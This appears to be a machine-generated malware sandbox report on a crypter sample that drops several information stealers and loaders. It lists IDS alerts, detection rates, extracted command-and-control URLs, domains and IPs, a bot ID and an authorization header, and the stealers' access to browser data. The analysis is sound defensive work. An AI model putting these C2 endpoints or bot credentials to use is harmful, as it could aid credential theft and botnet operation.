                              2024-09-21T14:49:33.942101+020020560081Domain Observed Used for C2 Detected192.168.2.9633501.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:37.126950+020020560221Domain Observed Used for C2 Detected192.168.2.9557421.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:33.724983+020020558341Domain Observed Used for C2 Detected192.168.2.9577071.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:51.791197+020020442471Malware Command and Control Activity Detected116.203.165.127443192.168.2.949751TCP
                              2024-09-21T14:49:52.227581+020020442471Malware Command and Control Activity Detected116.203.165.127443192.168.2.949801TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:53.441147+020020518311Malware Command and Control Activity Detected116.203.165.127443192.168.2.949753TCP
                              2024-09-21T14:49:55.295023+020020518311Malware Command and Control Activity Detected116.203.165.127443192.168.2.949805TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:49.994066+020020490871A Network Trojan was detected192.168.2.949747116.203.165.127443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:46.523820+020020460451A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:37.890382+020020494671A Network Trojan was detected192.168.2.949782185.196.8.21480TCP
                              2024-09-21T14:49:39.706883+020020494671A Network Trojan was detected192.168.2.949783185.196.8.21480TCP
                              2024-09-21T14:49:40.763392+020020494671A Network Trojan was detected192.168.2.949785185.196.8.21480TCP
                              2024-09-21T14:49:42.462025+020020494671A Network Trojan was detected192.168.2.949788185.196.8.21480TCP
                              2024-09-21T14:49:43.415108+020020494671A Network Trojan was detected192.168.2.949790185.196.8.21480TCP
                              2024-09-21T14:49:44.874094+020020494671A Network Trojan was detected192.168.2.949791185.196.8.21480TCP
                              2024-09-21T14:49:45.981364+020020494671A Network Trojan was detected192.168.2.949793185.196.8.21480TCP
                              2024-09-21T14:49:46.904866+020020494671A Network Trojan was detected192.168.2.949795185.196.8.21480TCP
                              2024-09-21T14:49:48.268760+020020494671A Network Trojan was detected192.168.2.949797185.196.8.21480TCP
                              2024-09-21T14:49:49.232949+020020494671A Network Trojan was detected192.168.2.949798185.196.8.21480TCP
                              2024-09-21T14:49:50.828101+020020494671A Network Trojan was detected192.168.2.949800185.196.8.21480TCP
                              2024-09-21T14:49:51.791934+020020494671A Network Trojan was detected192.168.2.949802185.196.8.21480TCP
                              2024-09-21T14:49:52.656211+020020494671A Network Trojan was detected192.168.2.949804185.196.8.21480TCP
                              2024-09-21T14:49:54.622756+020020494671A Network Trojan was detected192.168.2.949806185.196.8.21480TCP
                              2024-09-21T14:49:55.841149+020020494671A Network Trojan was detected192.168.2.949807185.196.8.21480TCP
                              2024-09-21T14:49:57.301999+020020494671A Network Trojan was detected192.168.2.949808185.196.8.21480TCP
                              2024-09-21T14:49:58.238002+020020494671A Network Trojan was detected192.168.2.949809185.196.8.21480TCP
                              2024-09-21T14:49:59.676744+020020494671A Network Trojan was detected192.168.2.949811185.196.8.21480TCP
                              2024-09-21T14:50:00.567593+020020494671A Network Trojan was detected192.168.2.949814185.196.8.21480TCP
                              2024-09-21T14:50:01.420447+020020494671A Network Trojan was detected192.168.2.949815185.196.8.21480TCP
                              2024-09-21T14:50:02.374107+020020494671A Network Trojan was detected192.168.2.949816185.196.8.21480TCP
                              2024-09-21T14:50:04.315801+020020494671A Network Trojan was detected192.168.2.949817185.196.8.21480TCP
                              2024-09-21T14:50:05.927417+020020494671A Network Trojan was detected192.168.2.949819185.196.8.21480TCP
                              2024-09-21T14:50:06.973593+020020494671A Network Trojan was detected192.168.2.949820185.196.8.21480TCP
                              2024-09-21T14:50:07.916699+020020494671A Network Trojan was detected192.168.2.949821185.196.8.21480TCP
                              2024-09-21T14:50:08.874848+020020494671A Network Trojan was detected192.168.2.949822185.196.8.21480TCP
                              2024-09-21T14:50:09.959603+020020494671A Network Trojan was detected192.168.2.949823185.196.8.21480TCP
                              2024-09-21T14:50:10.962742+020020494671A Network Trojan was detected192.168.2.949824185.196.8.21480TCP
                              2024-09-21T14:50:11.927391+020020494671A Network Trojan was detected192.168.2.949825185.196.8.21480TCP
                              2024-09-21T14:50:13.730144+020020494671A Network Trojan was detected192.168.2.949826185.196.8.21480TCP
                              2024-09-21T14:50:15.583568+020020494671A Network Trojan was detected192.168.2.949827185.196.8.21480TCP
                              2024-09-21T14:50:16.500899+020020494671A Network Trojan was detected192.168.2.949828185.196.8.21480TCP
                              2024-09-21T14:50:20.419092+020020494671A Network Trojan was detected192.168.2.949832185.196.8.21480TCP
                              2024-09-21T14:50:20.785479+020020494671A Network Trojan was detected192.168.2.949832185.196.8.21480TCP
                              2024-09-21T14:50:21.603699+020020494671A Network Trojan was detected192.168.2.949834185.196.8.21480TCP
                              2024-09-21T14:50:22.443868+020020494671A Network Trojan was detected192.168.2.949836185.196.8.21480TCP
                              2024-09-21T14:50:23.262577+020020494671A Network Trojan was detected192.168.2.949837185.196.8.21480TCP
                              2024-09-21T14:50:24.104661+020020494671A Network Trojan was detected192.168.2.949839185.196.8.21480TCP
                              2024-09-21T14:50:24.935483+020020494671A Network Trojan was detected192.168.2.949841185.196.8.21480TCP
                              2024-09-21T14:50:25.745759+020020494671A Network Trojan was detected192.168.2.949842185.196.8.21480TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:19.905417+020028561471A Network Trojan was detected192.168.2.94977245.202.35.10180TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:09.021938+020028032702Potentially Bad Traffic192.168.2.949712103.130.147.21180TCP
                              2024-09-21T14:48:09.432484+020028032702Potentially Bad Traffic192.168.2.949711147.45.44.10480TCP
                              2024-09-21T14:48:09.443354+020028032702Potentially Bad Traffic192.168.2.949713176.113.115.3380TCP
                              2024-09-21T14:48:09.573759+020028032702Potentially Bad Traffic192.168.2.949709147.45.44.10480TCP
                              2024-09-21T14:48:09.642506+020028032702Potentially Bad Traffic192.168.2.949718176.111.174.10980TCP
                              2024-09-21T14:48:10.468985+020028032702Potentially Bad Traffic192.168.2.949709147.45.44.10480TCP
                              2024-09-21T14:48:10.625354+020028032702Potentially Bad Traffic192.168.2.949726162.241.61.218443TCP
                              2024-09-21T14:48:10.640521+020028032702Potentially Bad Traffic192.168.2.949729162.241.61.218443TCP
                              2024-09-21T14:48:10.682067+020028032702Potentially Bad Traffic192.168.2.949709147.45.44.10480TCP
                              2024-09-21T14:48:10.933255+020028032702Potentially Bad Traffic192.168.2.949725185.166.143.48443TCP
                              2024-09-21T14:48:11.772275+020028032702Potentially Bad Traffic192.168.2.949731162.241.61.218443TCP
                              2024-09-21T14:48:12.772362+020028032702Potentially Bad Traffic192.168.2.949711147.45.44.10480TCP
                              2024-09-21T14:48:13.239610+020028032702Potentially Bad Traffic192.168.2.949711147.45.44.10480TCP
                              2024-09-21T14:48:15.698202+020028032702Potentially Bad Traffic192.168.2.949711147.45.44.10480TCP
                              2024-09-21T14:49:30.781974+020028032702Potentially Bad Traffic192.168.2.949776147.45.44.10480TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exeAvira: detection malicious, Label: TR/Dropper.Gen
                              Source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "3a15237aa92dcd8ccca447211fb5fc2a"}
                              Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
                              Source: 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.255.84:4284", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
                              Source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.unpackMalware Configuration Extractor: Amadey {"C2 url": "45.202.35.101/pLQvfD4d/index.php", "Version": "4.42", "Install Folder": "9d94d7e7d6", "Install File": "Hkbsse.exe"}
                              Source: 17.2.jsh_U9TvBUPPM2QGPo3kny24.exe.c00087e000.2.unpackMalware Configuration Extractor: LummaC {"C2 url": ["opponnentduei.shop", "chickerkuso.shop", "sentistivowmi.shop", "metallygaricwo.shop", "quotamkdsdqo.shop", "achievenmtynwjq.shop", "milldymarskwom.shop", "carrtychaintnyw.shop", "puredoffustow.shop"], "Build id": "a8kafm--@cloudcosmic"}
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe.7932.9.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["f20pt.top", "analforeverlovyu.top", "tventyvf20pt.top", "+tventyvf20pt.top", "pt.top", "@tventyvf20pt.top", "tyvf20pt.top"]}
                              Source: nerv.com.peVirustotal: Detection: 6%Perma Link
                              Source: C:\ProgramData\AKEGHIJJEH.exeReversingLabs: Detection: 79%
                              Source: C:\ProgramData\AKEGHIJJEH.exeVirustotal: Detection: 69%Perma Link
                              Source: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exeReversingLabs: Detection: 54%
                              Source: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exeVirustotal: Detection: 64%Perma Link
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeReversingLabs: Detection: 42%
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeVirustotal: Detection: 32%Perma Link
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)ReversingLabs: Detection: 42%
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)Virustotal: Detection: 32%Perma Link
                              Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeReversingLabs: Detection: 42%
                              Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeVirustotal: Detection: 32%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exeReversingLabs: Detection: 54%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exeVirustotal: Detection: 64%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exeReversingLabs: Detection: 79%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exeVirustotal: Detection: 69%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exeReversingLabs: Detection: 26%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exeVirustotal: Detection: 39%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exeReversingLabs: Detection: 62%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exeVirustotal: Detection: 55%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exeReversingLabs: Detection: 13%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exeVirustotal: Detection: 26%Perma Link
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeReversingLabs: Detection: 71%
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeVirustotal: Detection: 42%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeJoe Sandbox ML: detected
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeJoe Sandbox ML: detected
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: carrtychaintnyw.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: quotamkdsdqo.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: milldymarskwom.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: metallygaricwo.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: opponnentduei.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: puredoffustow.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: achievenmtynwjq.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: chickerkuso.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: sentistivowmi.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: carrtychaintnyw.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: quotamkdsdqo.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: milldymarskwom.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: metallygaricwo.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: opponnentduei.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: puredoffustow.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: achievenmtynwjq.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: chickerkuso.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: sentistivowmi.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: carrtychaintnyw.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: quotamkdsdqo.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: milldymarskwom.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: metallygaricwo.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: opponnentduei.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: puredoffustow.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: achievenmtynwjq.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: chickerkuso.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: sentistivowmi.shop
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                              Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmpString decryptor: a8kafm--@cloudcosmic
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0051CBD0 GetModuleHandleA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,2_2_0051CBD0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0051CE70 SetLastError,GetModuleHandleA,CryptGenRandom,2_2_0051CE70
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0051CD90 CryptReleaseContext,2_2_0051CD90

                              Bitcoin Miner

                              barindex
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                              Compliance

                              barindex
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeUnpacked PE file: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.unpack
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeUnpacked PE file: 35.2.videocompressor32.exe.400000.0.unpack
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nikko Video Compressor_is1
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.9:49707 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49708 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.9:49725 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49729 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 54.231.236.201:443 -> 192.168.2.9:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.74.161:443 -> 192.168.2.9:49735 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49736 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49743 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 45.132.206.251:443 -> 192.168.2.9:49786 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49792 version: TLS 1.2
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: .Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb# source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.PDBecti source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: d:\a42sr32\win32_x86\release\pdb\UniverseDesigner\designer.pdb source: h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000000.1616062018.0000000000525000.00000002.00000001.01000000.00000011.sdmp, h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000002.2155515118.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\exe\day2_mixApp.pdbk source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: PE.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\hSHxNXg.pdb source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.2154371709.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: HPJo8C:\Windows\day2_mixApp.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1852324342.0000000000F59000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: BotClient.pdb source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp
                              Source: Binary string: day2_mixApp.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmp, j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: orlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7504, type: MEMORYSTR
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00540905 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,2_2_00540905
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\.ms-ad\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_0175DEC8

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.9:49712 -> 103.130.147.211:80
                              Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.9:49745 -> 193.233.255.84:4284
                              Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.9:49745 -> 193.233.255.84:4284
                              Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 193.233.255.84:4284 -> 192.168.2.9:49745
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49739 -> 5.53.124.195:80
                              Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 193.233.255.84:4284 -> 192.168.2.9:49745
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49755 -> 5.53.124.195:80
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49764 -> 5.53.124.195:80
                              Source: Network trafficSuricata IDS: 2056008 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chickerkuso .shop) : 192.168.2.9:63350 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2056022 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionmwq .shop) : 192.168.2.9:55742 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2056023 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI) : 192.168.2.9:49794 -> 104.21.85.92:443
                              Source: Network trafficSuricata IDS: 2055834 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sentistivowmi .shop) : 192.168.2.9:57707 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49772 -> 45.202.35.101:80
                              Source: Network trafficSuricata IDS: 2056023 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI) : 192.168.2.9:49781 -> 104.21.85.92:443
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49800 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49782 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49791 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49783 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49802 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49798 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49793 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49811 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49807 -> 185.196.8.214:80
